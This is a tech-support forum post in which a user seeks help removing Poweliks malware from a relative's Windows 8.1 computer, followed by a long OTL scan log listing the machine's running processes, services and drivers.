
Poweliks and maybe something else nasty! [Solved]



#1
allforhimblog

  • Member
  • 98 posts

Okie ladies and gentlemen, I'm working on my grandma's computer. I'm not sure what she's been doing, but she has caught a nasty bug and I need help removing them. I feel like I'm pretty tech savvy and have used Malwarebytes, RogueKiller, and Avast, but this Poweliks malware... it has me whipped! Just when I think I've gotten rid of it, it shows back up and up and up and up and etc. I continue to receive PowerShell errors and Internet Explorer will not let me download or install anything, and this thing is running sllllllooooooowwwwww. I loaded Avast on a jump drive and installed it to this computer, and that downloaded Chrome, so thankfully I have a browser that will allow me to download anything needed. I was told to check this place out and look for help. I so appreciate your time and effort and look forward to taking this thing out!

 

Attached is my OTL log

 

OTL logfile created on: 2/21/2015 6:42:45 PM - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Dorothy01\Downloads
64bit- An unknown product  (Version = 6.3.9600) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17207)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
3.57 Gb Total Physical Memory | 2.44 Gb Available Physical Memory | 68.20% Memory free
3.96 Gb Paging File | 2.83 Gb Available in Paging File | 71.46% Paging File free
Paging file location(s): c:\pagefile.sys 400 4096 [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 444.06 Gb Total Space | 382.38 Gb Free Space | 86.11% Space Free | Partition Type: NTFS
Drive D: | 19.78 Gb Total Space | 2.47 Gb Free Space | 12.50% Space Free | Partition Type: NTFS
Drive F: | 7.44 Gb Total Space | 6.38 Gb Free Space | 85.71% Space Free | Partition Type: FAT32
 
Computer Name: DOROTHY | User Name: Dorothy01 | Logged in as Administrator.
Boot Mode: SafeMode with Networking | Scan Mode: Current user | Quick Scan | Include 64bit Scans
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - [2015/02/21 18:42:06 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Dorothy01\Downloads\OTL.exe
PRC - [2015/02/17 16:45:00 | 000,843,592 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2015/02/17 16:44:57 | 009,171,272 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\40.0.2214.115\pdf.dll
MOD - [2015/02/17 16:44:53 | 001,117,512 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\40.0.2214.115\libglesv2.dll
MOD - [2015/02/17 16:44:51 | 000,211,272 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\40.0.2214.115\libegl.dll
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - [2015/02/19 21:17:42 | 000,050,344 | ---- | M] (AVAST Software) [Auto | Stopped] -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe -- (avast! Antivirus)
SRV:64bit: - [2014/10/14 10:26:59 | 000,076,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\inetsrv\w3logsvc.dll -- (w3logsvc)
SRV:64bit: - [2014/09/24 02:38:43 | 000,111,616 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:64bit: - [2014/09/24 02:16:43 | 000,491,520 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\GeofenceMonitorService.dll -- (lfsvc)
SRV:64bit: - [2014/09/24 02:16:43 | 000,201,216 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\AudioEndpointBuilder.dll -- (AudioEndpointBuilder)
SRV:64bit: - [2014/09/24 02:03:47 | 000,347,880 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\NisSrv.exe -- (WdNisSvc)
SRV:64bit: - [2014/09/24 02:03:47 | 000,023,824 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend)
SRV:64bit: - [2014/09/24 01:50:29 | 001,306,624 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppXDeploymentServer.dll -- (AppXSvc)
SRV:64bit: - [2014/09/24 01:50:27 | 000,834,560 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\netlogon.dll -- (Netlogon)
SRV:64bit: - [2014/09/24 01:33:15 | 001,600,000 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\workfolderssvc.dll -- (workfolderssvc)
SRV:64bit: - [2014/09/24 01:32:55 | 002,898,432 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify)
SRV:64bit: - [2014/09/24 01:24:03 | 000,710,656 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsm.dll -- (LSM)
SRV:64bit: - [2014/09/24 01:24:02 | 000,530,944 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppReadiness.dll -- (AppReadiness)
SRV:64bit: - [2014/09/24 01:23:54 | 000,366,080 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wcmsvc.dll -- (Wcmsvc)
SRV:64bit: - [2014/09/24 01:23:52 | 003,394,384 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\WSService.dll -- (WSService)
SRV:64bit: - [2014/09/24 01:23:51 | 001,576,960 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wlidsvc.dll -- (wlidsvc)
SRV:64bit: - [2014/09/24 01:23:47 | 000,399,872 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\das.dll -- (DeviceAssociationService)
SRV:64bit: - [2014/09/24 01:23:47 | 000,269,824 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\bisrv.dll -- (BrokerInfrastructure)
SRV:64bit: - [2014/09/24 01:23:45 | 000,282,112 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\SystemEventsBrokerServer.dll -- (SystemEventsBroker)
SRV:64bit: - [2014/07/21 23:04:24 | 000,239,616 | ---- | M] (AMD) [Auto | Stopped] -- C:\Windows\SysNative\atiesrxx.exe -- (AMD External Events Utility)
SRV:64bit: - [2014/07/04 22:33:34 | 000,344,064 | ---- | M] (Advanced Micro Devices, Inc.) [Auto | Stopped] -- C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe -- (AMD FUEL Service)
SRV:64bit: - [2013/08/22 05:32:02 | 000,024,576 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wephostsvc.dll -- (WEPHOSTSVC)
SRV:64bit: - [2013/08/22 05:31:43 | 000,040,448 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\efssvc.dll -- (EFS)
SRV:64bit: - [2013/08/22 05:22:45 | 000,066,048 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wiarpc.dll -- (WiaRpc)
SRV:64bit: - [2013/08/22 05:21:15 | 000,013,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\svsvc.dll -- (svsvc)
SRV:64bit: - [2013/08/22 05:16:57 | 000,118,272 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\fhsvc.dll -- (fhsvc)
SRV:64bit: - [2013/08/22 04:25:28 | 000,164,352 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\NcaSvc.dll -- (NcaSvc)
SRV:64bit: - [2013/08/22 04:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicvss)
SRV:64bit: - [2013/08/22 04:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmictimesync)
SRV:64bit: - [2013/08/22 04:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicshutdown)
SRV:64bit: - [2013/08/22 04:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicrdv)
SRV:64bit: - [2013/08/22 04:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmickvpexchange)
SRV:64bit: - [2013/08/22 04:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicheartbeat)
SRV:64bit: - [2013/08/22 04:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicguestinterface)
SRV:64bit: - [2013/08/22 04:02:47 | 000,013,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\smphost.dll -- (smphost)
SRV:64bit: - [2013/08/22 03:57:25 | 000,130,560 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ScDeviceEnum.dll -- (ScDeviceEnum)
SRV:64bit: - [2013/08/22 03:54:59 | 000,059,392 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\keyiso.dll -- (KeyIso)
SRV:64bit: - [2013/08/22 03:50:59 | 000,245,760 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\TimeBrokerServer.dll -- (TimeBroker)
SRV:64bit: - [2013/08/22 03:50:00 | 000,525,312 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netprofmsvc.dll -- (netprofm)
SRV:64bit: - [2013/08/22 03:45:59 | 000,151,040 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ncbservice.dll -- (NcbService)
SRV:64bit: - [2013/08/22 03:40:49 | 000,248,832 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\vaultsvc.dll -- (VaultSvc)
SRV:64bit: - [2013/08/22 03:31:03 | 000,201,728 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\DeviceSetupManager.dll -- (DsmSvc)
SRV:64bit: - [2013/08/22 03:15:54 | 000,073,728 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\NcdAutoSetup.dll -- (NcdAutoSetup)
SRV:64bit: - [2009/11/17 20:14:26 | 000,098,208 | ---- | M] (Andrea Electronics Corporation) [Auto | Stopped] -- C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe -- (AERTFilters)
SRV - [2014/10/14 10:27:02 | 000,475,648 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\inetsrv\iisw3adm.dll -- (WAS)
SRV - [2014/10/14 10:26:58 | 000,066,560 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\inetsrv\w3logsvc.dll -- (w3logsvc)
SRV - [2014/10/14 10:26:56 | 000,062,464 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysWOW64\inetsrv\apphostsvc.dll -- (AppHostSvc)
SRV - [2014/09/24 02:16:42 | 000,357,376 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\GeofenceMonitorService.dll -- (lfsvc)
SRV - [2014/09/24 01:32:55 | 002,898,432 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\system32\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify)
SRV - [2013/08/21 21:55:35 | 000,018,944 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\StorSvc.dll -- (StorSvc)
SRV - [2013/08/21 20:53:34 | 000,011,776 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\smphost.dll -- (smphost)
SRV - [2013/05/20 22:44:22 | 000,144,368 | R--- | M] (Symantec Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Norton Internet Security\Engine\20.6.0.27\ccSvcHst.exe -- (NIS)
SRV - [2012/08/15 14:29:52 | 000,085,504 | ---- | M] (Hewlett-Packard Company) [Auto | Stopped] -- C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe -- (HP Support Assistant Service)
SRV - [2012/07/19 19:06:58 | 000,035,232 | ---- | M] (Hewlett-Packard) [Auto | Stopped] -- c:\Program Files (x86)\Hewlett-Packard\HP Connected Remote\HPConnectedRemoteService.exe -- (HPConnectedRemote)
SRV - [2012/07/13 19:02:16 | 002,451,456 | ---- | M] (Realsil Microelectronics Inc.) [Auto | Stopped] -- C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe -- (IconMan_R)
SRV - [2010/10/12 11:59:12 | 000,206,072 | ---- | M] (WildTangent, Inc.) [On_Demand | Stopped] -- C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe -- (GamesAppService)
 
 
========== Driver Services (SafeList) ==========
 
DRV:64bit: - [2015/02/20 19:18:37 | 000,037,624 | ---- | M] () [Kernel | On_Demand | Unknown] -- C:\Windows\SysNative\drivers\TrueSight.sys -- (TrueSight)
DRV:64bit: - [2015/02/19 21:49:23 | 000,129,752 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys -- (MBAMSwissArmy)
DRV:64bit: - [2015/02/19 21:27:38 | 001,050,432 | ---- | M] (AVAST Software) [File_System | System | Stopped] -- C:\Windows\SysNative\drivers\aswsnx.sys -- (aswSnx)
DRV:64bit: - [2015/02/19 21:27:14 | 000,083,280 | ---- | M] (AVAST Software) [File_System | Auto | Stopped] -- C:\Windows\SysNative\drivers\aswmonflt.sys -- (aswMonFlt)
DRV:64bit: - [2015/02/19 21:17:47 | 000,436,624 | ---- | M] (AVAST Software) [File_System | System | Stopped] -- C:\Windows\SysNative\drivers\aswSP.sys -- (aswSP)
DRV:64bit: - [2015/02/19 21:17:47 | 000,267,632 | ---- | M] () [Kernel | Boot | Stopped] -- C:\WINDOWS\SysNative\drivers\aswVmm.sys -- (aswVmm)
DRV:64bit: - [2015/02/19 21:17:47 | 000,065,776 | ---- | M] () [Kernel | Boot | Stopped] -- C:\WINDOWS\SysNative\drivers\aswRvrt.sys -- (aswRvrt)
DRV:64bit: - [2015/02/19 21:17:47 | 000,029,208 | ---- | M] () [Kernel | Auto | Stopped] -- C:\Windows\SysNative\drivers\aswHwid.sys -- (aswHwid)
DRV:64bit: - [2014/09/24 02:46:53 | 000,055,328 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\wpcfltr.sys -- (wpcfltr)
DRV:64bit: - [2014/09/24 02:03:47 | 000,257,880 | ---- | M] (Microsoft Corporation) [File_System | Boot | Stopped] -- C:\Windows\SysNative\drivers\WdFilter.sys -- (WdFilter)
DRV:64bit: - [2014/09/24 02:03:47 | 000,123,224 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WdNisDrv.sys -- (WdNisDrv)
DRV:64bit: - [2014/09/24 02:03:47 | 000,035,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WdBoot.sys -- (WdBoot)
DRV:64bit: - [2014/09/24 01:50:37 | 000,157,016 | ---- | M] (Microsoft Corporation) [File_System | Boot | Running] -- C:\WINDOWS\SysNative\drivers\wof.sys -- (Wof)
DRV:64bit: - [2014/09/24 01:50:30 | 000,136,024 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\wfplwfs.sys -- (WFPLWFS)
DRV:64bit: - [2014/09/24 01:50:28 | 000,376,152 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\clfs.sys -- (CLFS)
DRV:64bit: - [2014/09/24 01:33:00 | 000,126,464 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NdisImPlatform.sys -- (NdisImPlatform)
DRV:64bit: - [2014/09/24 01:32:59 | 000,149,312 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpioclx.sys -- (GPIOClx0101)
DRV:64bit: - [2014/09/24 01:32:54 | 000,468,288 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\USBHUB3.SYS -- (USBHUB3)
DRV:64bit: - [2014/09/24 01:32:54 | 000,412,992 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\spaceport.sys -- (spaceport)
DRV:64bit: - [2014/09/24 01:23:53 | 000,924,504 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\WINDOWS\SysNative\drivers\refs.sys -- (ReFS)
DRV:64bit: - [2014/09/24 01:23:48 | 000,146,776 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx2.sys -- (SerCx2)
DRV:64bit: - [2014/09/24 01:23:32 | 000,175,960 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\VerifierExt.sys -- (VerifierExt)
DRV:64bit: - [2014/09/24 01:23:31 | 000,236,888 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\sdbus.sys -- (sdbus)
DRV:64bit: - [2014/09/24 01:23:31 | 000,086,872 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\pdc.sys -- (pdc)
DRV:64bit: - [2014/09/24 01:23:31 | 000,079,192 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\sdstor.sys -- (sdstor)
DRV:64bit: - [2014/09/24 01:23:31 | 000,039,768 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\intelpep.sys -- (intelpep)
DRV:64bit: - [2014/09/24 01:23:31 | 000,033,280 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\BasicRender.sys -- (BasicRender)
DRV:64bit: - [2014/09/24 01:23:30 | 000,325,464 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\USBXHCI.SYS -- (USBXHCI)
DRV:64bit: - [2014/09/24 01:23:30 | 000,189,784 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\UCX01000.SYS -- (UCX01000)
DRV:64bit: - [2014/09/24 01:23:30 | 000,057,176 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\stornvme.sys -- (stornvme)
DRV:64bit: - [2014/09/24 00:53:14 | 000,027,488 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)
DRV:64bit: - [2014/09/24 00:53:09 | 000,037,216 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\terminpt.sys -- (terminpt)
DRV:64bit: - [2014/07/23 13:20:33 | 000,177,312 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SYMEVENT64x86.SYS -- (SymEvent)
DRV:64bit: - [2014/07/21 23:04:28 | 013,209,088 | ---- | M] (Advanced Micro Devices, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\atikmdag.sys -- (amdkmdag)
DRV:64bit: - [2014/07/21 23:04:28 | 000,626,688 | ---- | M] (Advanced Micro Devices, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\atikmpag.sys -- (amdkmdap)
DRV:64bit: - [2013/12/04 12:02:30 | 002,505,904 | ---- | M] (Ralink Technology, Corp.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\netr28x.sys -- (netr28x)
DRV:64bit: - [2013/08/22 07:25:40 | 000,043,008 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\condrv.sys -- (condrv)
DRV:64bit: - [2013/08/22 07:25:40 | 000,030,048 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\WINDOWS\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2013/08/22 06:50:19 | 000,057,696 | ---- | M] (Microsoft Corporation) [Kernel | System | Stopped] -- C:\Windows\SysNative\drivers\dam.sys -- (dam)
DRV:64bit: - [2013/08/22 06:49:54 | 000,079,712 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\acpiex.sys -- (acpiex)
DRV:64bit: - [2013/08/22 06:49:33 | 000,159,584 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\tpm.sys -- (TPM)
DRV:64bit: - [2013/08/22 06:43:49 | 000,063,840 | ---- | M] (Marvell Semiconductor, Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\mvumis.sys -- (mvumis)
DRV:64bit: - [2013/08/22 06:43:48 | 000,041,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpiowin32.sys -- (msgpiowin32)
DRV:64bit: - [2013/08/22 06:43:45 | 003,357,024 | ---- | M] (Broadcom Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2013/08/22 06:43:45 | 000,093,536 | ---- | M] (LSI Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2013/08/22 06:43:45 | 000,082,784 | ---- | M] (LSI Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\lsi_sss.sys -- (LSI_SSS)
DRV:64bit: - [2013/08/22 06:43:45 | 000,064,352 | ---- | M] (Hewlett-Packard Company) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2013/08/22 06:43:44 | 000,081,760 | ---- | M] (LSI Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\lsi_sas3.sys -- (LSI_SAS3)
DRV:64bit: - [2013/08/22 06:43:41 | 000,782,176 | ---- | M] (PMC-Sierra) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\adp80xx.sys -- (ADP80XX)
DRV:64bit: - [2013/08/22 06:43:41 | 000,531,296 | ---- | M] (Broadcom Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2013/08/22 06:43:41 | 000,259,424 | ---- | M] (AMD Technologies Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2013/08/22 06:43:41 | 000,108,896 | ---- | M] (LSI) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\3ware.sys -- (3ware)
DRV:64bit: - [2013/08/22 06:43:41 | 000,079,200 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2013/08/22 06:43:40 | 000,114,016 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\EhStorTcgDrv.sys -- (EhStorTcgDrv)
DRV:64bit: - [2013/08/22 06:43:40 | 000,082,784 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\EhStorClass.sys -- (EhStorClass)
DRV:64bit: - [2013/08/22 06:43:40 | 000,025,952 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2013/08/22 06:43:34 | 000,305,504 | ---- | M] (VIA Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\VSTXRAID.SYS -- (VSTXRAID)
DRV:64bit: - [2013/08/22 06:43:33 | 000,074,080 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\uaspstor.sys -- (UASPStor)
DRV:64bit: - [2013/08/22 06:43:32 | 000,031,072 | ---- | M] (Promise Technology, Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2013/08/22 06:43:31 | 000,107,872 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\storahci.sys -- (storahci)
DRV:64bit: - [2013/08/22 06:43:31 | 000,072,032 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SpbCx.sys -- (SpbCx)
DRV:64bit: - [2013/08/22 06:43:31 | 000,069,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx.sys -- (SerCx)
DRV:64bit: - [2013/08/22 06:39:15 | 000,026,976 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\uefi.sys -- (UEFI)
DRV:64bit: - [2013/08/22 06:37:27 | 000,069,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vpci.sys -- (vpci)
DRV:64bit: - [2013/08/22 06:36:12 | 000,026,976 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WpdUpFltr.sys -- (WpdUpFltr)
DRV:64bit: - [2013/08/22 05:39:54 | 000,076,800 | ---- | M] (Microsoft Corporation) [Kernel | System | Stopped] -- C:\Windows\SysNative\drivers\ahcache.sys -- (ahcache)
DRV:64bit: - [2013/08/22 05:39:31 | 000,050,688 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\BasicDisplay.sys -- (BasicDisplay)
DRV:64bit: - [2013/08/22 05:39:20 | 000,022,016 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HyperVideo.sys -- (HyperVideo)
DRV:64bit: - [2013/08/22 05:39:06 | 000,009,728 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mshidumdf.sys -- (mshidumdf)
DRV:64bit: - [2013/08/22 05:38:58 | 000,010,752 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpitime.sys -- (acpitime)
DRV:64bit: - [2013/08/22 05:38:48 | 000,010,240 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpipagr.sys -- (acpipagr)
DRV:64bit: - [2013/08/22 05:38:39 | 000,036,992 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthAvrcpTg.sys -- (BthAvrcpTg)
DRV:64bit: - [2013/08/22 05:38:26 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\kdnic.sys -- (kdnic)
DRV:64bit: - [2013/08/22 05:38:23 | 000,011,264 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vmgencounter.sys -- (gencounter)
DRV:64bit: - [2013/08/22 05:38:22 | 000,023,040 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\npsvctrig.sys -- (npsvctrig)
DRV:64bit: - [2013/08/22 05:38:16 | 000,030,720 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthhfHid.sys -- (bthhfhid)
DRV:64bit: - [2013/08/22 05:37:49 | 000,013,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hyperkbd.sys -- (hyperkbd)
DRV:64bit: - [2013/08/22 05:37:46 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:64bit: - [2013/08/22 05:37:42 | 000,057,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bthhfenum.sys -- (BthHFEnum)
DRV:64bit: - [2013/08/22 05:37:28 | 000,056,320 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:64bit: - [2013/08/22 05:37:28 | 000,041,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hidi2c.sys -- (hidi2c)
